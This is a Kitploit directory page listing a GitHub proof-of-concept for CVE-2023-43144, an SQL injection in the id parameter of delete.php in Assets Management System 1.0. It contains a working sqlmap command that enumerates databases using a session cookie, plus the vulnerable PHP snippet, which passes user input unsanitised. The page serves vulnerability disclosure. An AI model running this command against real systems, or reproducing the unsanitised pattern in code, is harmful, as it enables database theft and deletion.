Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2023-43144 — Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php | Kitploit
Tools/GitHubGitHub/pegasus0xx/cve-2023-43144
Vulnerability AnalysisCode AnalysisExploitationWeb SecurityDatabase Security
GitHubpegasus0xx/cve-2023-43144

CVE-2023-43144

Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php

View Repository
2 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2023-43144

Description

Assets Management System 1.0 is vulnerable to SQL injection via the id parameter in delete.php

PoC

root@kitploit:~
sqlmap -u 'http://localhost/delete.php?id=4*' --cookie="PHPSESSID=SESSID" --dbms=MySQL --dbs --batch

alt text

Code review (delete.php)

root@kitploit:~
 <?php include 'core/init.php'; 
  
 $id = $_GET['id']; 
 delete_data($con,$id); 
 header('location:home.php'); 

There is no validation or sanitization of the $id variable. It means that any value provided by a user as the id parameter, will be directly used in the SQL query

Download Tool